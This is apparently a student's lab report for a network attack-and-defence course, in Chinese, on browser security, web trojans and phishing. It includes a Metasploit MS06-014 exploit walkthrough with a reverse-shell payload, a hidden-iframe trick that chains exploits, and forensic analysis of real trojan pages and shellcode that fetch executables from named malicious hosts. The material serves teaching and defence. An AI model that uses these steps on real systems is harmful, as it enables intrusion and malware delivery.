20199135 2019-2020-2 《網絡攻防實踐》第12周做業

學號 2019-2020-2 《網絡攻防實踐》第12周做業

問題	回答
做業所屬課程	網絡攻防實踐(https://edu.cnblogs.com/campus/besti/19attackdefense)
這個做業的要求在哪裏	https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10756
我在這個課程的目標是	學習第十二章
這個做業在哪一個具體方面幫助我實現目標	熟悉linux環境
做業正文	見下文
參考文獻	見博客結尾

1.實踐內容

12.1.1 Web瀏覽器戰爭與技術發展
•瀏覽器戰爭
（1）第一次瀏覽器戰爭：1995—1998年間，對陣雙方是網景公司的Netscape瀏覽器和微軟公司的IE瀏覽器。
（2）第二次瀏覽器戰爭
•瀏覽器技術發展
20世紀90年代初誕生的古典命令行瀏覽器僅僅實現了簡單的HTTP客戶端、HTML解析與渲染功能，而在瀏覽器的商業化與商業競爭過程當中，出現了高度注重用戶使用感覺的圖形界面瀏覽器軟件，並逐步提供了對圖片、音視頻等多媒體的支持，經過XML對結構化信息的輸入、存儲與展示功能的支持，以及引入客戶端執行機制、與服務器的異步交互以及瀏覽器可擴展性機制，逐步進化出目前互聯網用戶所依賴的現代瀏覽器。
12.1.2 Web瀏覽的安全問題與威脅
• web瀏覽器軟件的安全困境三要素
表如今複雜性可擴展性連通性三方面
• Web瀏覽安全威脅位置

12.2.2網頁木馬的機理分析
•網頁木馬的定義特性
網頁木馬從本質特性上是利用了現代Web瀏覽器軟件中所支持的客戶端腳本執行能力，針對Web瀏覽端軟件安全漏洞實施客戶端滲透攻擊，從而取得在客戶端主機的遠程代碼執行權限來植入惡意程序。
咱們定義網頁木馬是對Web瀏覽端軟件進行客戶端滲透攻擊的一類惡意移動代碼，一般以網頁腳本語言如JavaScript. VBScirpt實現，或以Flash、PDF等惡意構造的Web文件形式存在，經過利用Web瀏覽端軟件中存在的安全漏洞，得到客戶端計算• 機的控制權限以植入惡意程序。
•對網頁木馬機理的全方位分析與理解
網頁木馬的攻擊是被動式的，須要經過一地技術方法來誘使互聯網用戶來訪問網頁木馬頁面。每每涉及較爲複雜的多步驟攻擊場景，並須要多種類型的惡意代碼及網絡資源。

•網頁木馬的本質核心——瀏覽器滲透攻擊
網頁木馬的本質核心是利用Web瀏覽端軟件安仝漏洞的滲透攻擊代碼。
•網頁掛馬機制
網頁掛馬的機制不少，有以下四類策略。
（1） 內農HTML標籤
（2） 惡意Script腳本
（3） 內嵌對象連接
（4） ARP欺騙掛馬
•混淆機制
除了引入中間跳轉節點進行嵌套連接，並集成多種滲透攻擊代碼以外,每每採用了大量的混淆技術，從而使得網頁木馬攻擊網絡更難被檢測和摧毀,這些混淆技術也被稱爲「免 殺"。
12.2.3網頁木馬的檢測與分析技術
•基於特徵碼匹配的傳統檢測方法
•基於統計與機器學習的靜態分析方法
•基於動態行爲結果斷定的檢測分析方法
•基於模擬瀏覽器環境的動態分析檢測方法
12.2.6網頁木馬防範措施
應對網頁木馬最根木的防範措施與應對傳統滲透攻擊同樣，就是提高操做系統與瀏覽端平臺軟件的安全性。
1.採用操做系統自己提供的在線更新以及第三方軟件所提供的經常使用應用軟件更新機制，來確保所使用的計算機始終處於一種相對安全的狀態。
2.安裝與實時更新一款優秀的反病毒軟件也是應對網頁木馬威脅必不可少的。
3.養成安全上網瀏覽的良好習慣,並藉助J - Google安全瀏覽、SiteAdvisor等站點安全評估工具的帶助, 避免訪問那些可能遭遇掛馬或者安令性不髙的網站，能夠有效地下降被網頁木馬滲透攻擊的機率。
4.在目前網頁木馬威脅主要危害Windows平臺和IE瀏覽器用戶的狀況R 或許安裝Mac OS/Linux操做系統，並使用Chrome、Safari、Opera等冷門瀏覽器進行上網，能夠有效地避免網頁木馬的侵擾。
12.3.2網絡釣魚攻擊技術策略
①在指向假冒網站的連接中使用1P地址代替域名。
②註冊發音相近或形似的DNS域名（如與工商銀行域名icbc.com.cn僅有一個字母 之差的lcbc.com.cn）,並在上而架設假冒網站，指望用戸不會發現他們之冋的差別。
③在一個假冒釣魚網站的電子郵件HTML內容中嵌入一些指向真實的目標網站連接， 從而使得用戶的網站瀏覽器大多數HTTP鏈接是指向真實的目標網站，而僅有少數的關鍵鏈接（如提交敏感信息的頁面）指向假冒的網站。
④對假冒網站的URL進行編碼和混淆，不少用戶不會注意到或者理解URL連接被作過什麼處理，並會假設它是良性的。
⑤企圖攻擊用戶網頁瀏覽器存在的漏洞，使之隱蔵消息內容的實質。
⑥將假冒的釣魚網站配置成記錄用屍提交的全部數據並進行不可察覺的日誌，而後將用戶重定向到真實的網站。
⑦架設一個假刊網站，做爲目標機構真實網站的代理。
⑧經過惡意代碼在受害者計算機上安裝一個惡意的瀏覽器助手。
⑨使用惡意代碼去修改受害者計算機上的用來維護DNS域名和IP地址映射的本地 hosts文件。
12.3.3網絡釣魚攻擊的防範
①針對網絡釣魚過程當中的電子郵件和即時通訊信息欺詐,應該提升警戒性。
②充分利用瀏覽器軟件、網絡安全廠商軟件所提供的反釣角。
③在登陸網上銀行、證券基金等關鍵網站進行在線金融操做時,務必要垂視訪問網站的真實性，不要點擊郵件中的連接來訪問這些網站，最好以直接訪問域名方式來訪問，儘可能使用硬件u盾來代替軟證書或口令訪問重要的金融網站。
④經過學習和修煉提高本身抵抗社會工程學攻擊的能力。

2.實踐過程

動手實踐一一Web瀏覽器滲透攻擊實驗

任務：使用攻擊機和Windows靶機進行瀏覽器滲透攻擊實驗，體驗網頁木馬構造及實施瀏覽器攻擊的實際過程。
所需環境：
①攻擊機：BT4 Linux攻擊機或Windows XP_Attacker攻擊機，使用其中安裝的 Metasploit滲透攻擊框架軟件；
②靶機：未打補丁的Windows靶機，可以使用Windows 2KS靶機或Windows XP靶機。 實驗步驟；
①選擇使用Metasploit中的MS06-0I4滲透攻擊模塊(ie_createobject)；
②選擇PAYLOAD爲任意遠程Shell鏈接：
③設置服務器地址(SVRHOST或LHOST)和URL參數，運行exploit,構造出惡意 網頁木馬腳本；
④在靶機環境中啓動瀏覽器，驗證與服務器的連通性，並訪問惡意網頁木馬腳本URL；
⑤在攻擊機的Metasploit軟件中査看滲透攻擊狀態，並經過成功滲透攻擊後創建起的 遠程控制會話SESSION,在靶機上遠程執行命令。
1.首先啓動Metasploit，而後搜索漏洞MS06-014信息，執行use命令選擇該漏洞
2.而後設置本地ip爲攻擊機ip，執行set Lhost 192.168.200.2,將惡意服務器地址配置爲本機
3.最後設置載荷，這裏選擇使用經常使用的，執行set payload windows/meterpreter/reverse_tcp
4.啓動攻擊，而後生成了惡意連接，並創建了一個惡意服務器

5.將該惡意連接複製到靶機ie瀏覽器地址欄打開，而後會發如今攻擊機上出現了反饋信息
6.查看會話列表，發現了靶機同攻擊機創建的鏈接，而後執行sessions -i 1，選擇該會話

7.成功實現遠程控制了靶機，可對靶機輸入命令執行

Web瀏覽器滲透攻擊對抗實驗

在實踐一中已經用了一個MS06-014漏洞進行攻擊，在靶機訪問metasploit裏生成的連接，攻擊機便可獲取到會話，而且控制靶機；
1.把靶機訪問的連接的網頁給保存下來，而後打開分析，發現該網頁爲了防止被殺毒軟件查殺，對關鍵指令作了字符串拼接處理和使用了大量的空白和間隔。
去除無效回車符和空格後，獲得了完整的網頁信息,而後能夠看到，該網頁中的JavaScript使用了createObject，GetObject，Wscript.shell,
Adobe.stream等指令
2.而後能夠看到，下圖中使用js調用了document.location加載了payload，而且下一行中後面跟了一個可執行文件fHEzfuTlSyw.exe;猜測這個可執行文件應該是以攻擊機爲服務器，經過網頁下載到靶機上的，並且爲了躲避殺毒軟件，每次加載惡意網頁生成的可執行文件的名字是不同的，同時打開靶機任務管理器查看正在運行的程序，果真發現了在網頁源碼中出現的那個可執行文件，這個應該是幫助攻擊機獲取靶機控制權限的惡意程序。


3.分析整個頁面，整個網頁在訪問的時候只會在中出現隨機的字符串，並無什麼奇怪的地方，剛開始並不清楚該如何將兩個漏洞的攻擊合併到一個惡意連接中，前面的掛馬分析給了我靈感，是否能夠經過metasploit利用其它瀏覽器漏洞再生成一個惡意連接，咱們分析的這個惡意網頁的內容主體中插入一個隱藏狀態的內聯框架,其中的連接指向新的惡意連接地址，而後將兩個惡意網頁放到攻擊機apache的www目錄下呢，嘗試了一下使用另一個漏洞極光，將生成的惡意連接放到內聯框。

4.將修改後的惡意網頁放到www目錄下，同時啓動metasploit進行監聽，依舊可以監聽到會話，而且有多個會話

5.成功獲取了靶機的控制權限。

取證分析實踐：剖析一個實際的網頁木馬攻擊場景

1.因爲題目附帶的材料中給出的網址已經失效，沒法還原真實的網頁木馬攻擊場景，只能根據材料提供的一些文件來進行分析，首先用記事本打開start.htm，而後分析了一下，發如今該網頁嵌入了一個內聯框架，指向了一個網頁new09.htm，且該內聯框架高度寬度爲0，不容易被發現

2.指向new09.htm網頁使用的是相對路徑，說明new09.htm應該是跟start.htm在同一個目錄下，因而修改url，獲取到new09.htm頁面信息，分析，發現其經過內聯框架指向了一個頁面http://aa.18dd.net/aa/kl.htm，還使用script指向了另外一個頁面http://js.users.51.la/1299644.js

3.按照實驗指導書步驟獲取指向的兩個網頁內容之後打開分析，發現其中一個裏面沒有什麼有用的信息，打開另一個，發現裏面不少信息，彷佛被加密過，沒法分析出有效信息，因而將整個網頁信息複製到FreShow工具的內容框中（這是一個用於js加解密的工具），而後點擊解碼按鈕，在下方的框中生成了解碼後的信息，能夠簡單分析出使用了base64進行編碼加密，密碼爲"script"

4.而後將其中一段複製到FreShow工具的內容框中（這段內容哪裏來的沒看懂，實驗指導書上沒寫明白），進行解碼，獲得以下信息，顯示有些錯亂，通過整理後發現用到的應用程序漏洞有「Adodb.Stream」、「MPS.StormPlayer」、「POWERPLAYER.PowerPlayerCtrl.1」和「BaiduBar.Tool」，分別對應利用了微軟數據庫訪問對象、 暴風影音、PPStream 和百度搜霸的漏洞；最後還有一個下載惡意程序的行爲。

5.而後打開材料提供好的1.js進行分析，一樣將內容複製到FreShow工具的內容框中進行解碼，而後生成信息以下圖，該js文件下載了一個exe可執行文件

6.接下來使用一樣的方法來分析b.js，可是發現使用FreShow根本沒法解碼，試了實驗指導書上的解碼網站，也沒法訪問，只能根據實驗指導書解碼的內容進行分析了；解碼後的內容裏有shellcode，多是使用了該方式進行攻擊。

7.因爲要執行的exe文件已經在參考資料中提供，因此直接打開分析，首先使用peid打開bf.exe查看是否加殼，發現沒有加殼，而且該程序是使用Delphi開發的

8.而後使用W32Dasm工具進行反編譯，查看字符串信息，能夠看到，該程序自啓動了IE瀏覽器，並生成一個bat批處理文件，而後是執行了刪除操做，刪除一些文件，還從惡意網站下載了20個惡意程序到受害者主機上；shell\Auto\command=說明了該程序會自動執行shell指令，啓動受害者主機目錄下的一個程序；最後還發現了"瑞星卡卡上網安全助手 - IE 防漏牆"，"容許"， "容許執行",這個應該是防止被殺毒軟件查殺的設置。

9.參考資料裏已經提供了這20個惡意程序，嘗試着分析其中一個4.exe，首先使用peid打開，而後發現該程序已經加殼，而後再用超級巡警脫殼機進行脫殼，再用peid打開脫殼後的程序，發現還有一個殼"Morphine 1.2 - 1.3 -> rootkit",根據實驗指導書上的解釋，這是一個假裝殼，不須要管它，而後我嘗試了使用IDA、W32Dasm等進行反彙編，發現提示缺乏頭文件，沒法打開，最後使用的是C32Asm成功打開了脫殼以後的4.exe，而後查看字符串信息，看到關鍵信息"bat",彷佛又執行的是批處理文件，可是具體內容沒法分析出來，裏面有不少亂碼

10.因爲沒法分析惡意程序內容，只好在先嚐試着運行這些惡意程序，下載了360衛士，將惡意程序拖到安全沙箱裏運行，而後發現監測出了大量的木馬和惡意程序，惡意程序在windows系統文件目錄下生成了可執行程序和dll動態連接庫文件

實踐回答：
1.
2.使用了base64進行編碼加密，密碼爲「script」，直接使用工具FreShow便可解密
3.MS06-014網馬、暴風影音網馬、PPStream網馬、百度搜霸網馬
4.解密後發現經過js中的指令從惡意站點下載了可執行文件，下載器即爲bb/014.exe，執行該程序將從惡意站點down.18dd.net下載20個惡意程序
5.將執行惡意程序4.exe後在windows系統目錄下生成的一個惡意木馬提取出來，首先使用peid打開查看發現沒有加殼，而後使用反彙編工具打開查看字符串信息，發現一個關鍵信息send，猜測多是將受害者主機上的某些信息發送到目標地址，而後下面還有一個url信息，因爲字符顯示問題，並不能分析出該url指向何處。

Web瀏覽器遭遇攻擊

1.列出在捕獲文件中的應用層協議類型， 你認爲攻擊是針對哪一個或哪些協議的？
應用層協議主要有
(1)域名系統(DNS)：用於實現網絡設備名字到IP地址映射的網絡服務。
(2)文件傳輸協議(FTP)：用於實現交互式文件傳輸功能。
(3)簡單郵件傳送協議 SMTP)：用於實現電子郵箱傳送功能。
(4)超文本傳輸協議(HTTP)：用於實現WWW服務。
(5)簡單網絡管理協議(SNMP)：用於管理與監視網絡設備。
(6)遠程登陸協議(Telnet)：用於實現遠程登陸功能。

2.用wirshark打開pcap文件，能夠統計一下主要流量爲HTTP/TCP協議。應該是針對TCP協議。

3.列出捕獲文件中的 IP 地址、主機名和域名。從這些信息中你能猜出攻擊場景的環境配置狀況嗎？
經過統計功能，並在wireshark顯示IP地址對應名稱，能夠選擇Name resolution複選框。要查看IP名稱解析，進入View | Name Resolution | Enable for Network layer進行激活。攻擊場景應該是虛擬機，由於出現了不少mac地址相同的主機。

4.列出捕獲文件中的全部網頁頁面， 其中哪些頁面包含了可疑的、多是惡意的
JavaScript 腳本代碼？誰在鏈接這些頁面？請描述惡意網頁的攻擊目的？

5.打開session_0006.part_01.html，現了以下界面，這應該是一個釣魚網站，顯然是惡意建立的對應的就是Rapidshare.com的高級帳號(網站創立於2003年，是世界知名的文件上傳下載託管服務網站)

6.根據資料提示再查看session_0032.part_01.html,會提示網站受損。

7.再找到session_0007.part_02.html。

8.請給出攻擊者執行攻擊動做的概要描述(ip地址10.0.2.15)。
其首先讓受害者登錄到構建的假的Rapidshare.com，在裏面的js腳本將該內容又被重定向到sploitme.com.cn/fg/show.php?s=3feb5a6b2f， 其中包含一些javascript。最後返回一個404界面。

9.攻擊者的目標是哪一個操做系統，哪些應用軟件，哪些安全漏洞？如何阻止這些攻擊？
追蹤TCP 流，能夠看到這是一個針對Windows XP系統下IE瀏覽器漏洞。

10.Shellcode 執行了哪些動做？請列出 Shellcode 的 MD5，並比較它們之間的差別？
Shellcode獲取系統臨時文件路徑，加載urlmon.dll，從 URL http://sploitme.com.cn/fg/load.php?e=1檢索可執行文件，而後執行它。 Shellcode 之間的惟一區別是對load.php腳本的請求中的e變量，該變量指定發送惡意軟件可執行文件。

11.在攻擊場景中有二進制可執行惡意代碼參與嗎？它們的目的是什麼？
有，目的是下載可執行文件並在本地執行。

3.實踐總結

除了實踐一，其餘的真是好難啊，不參考無從下手，參考了仍是有卡殼，不愧是壓軸實踐（哭泣＋懷疑人生）。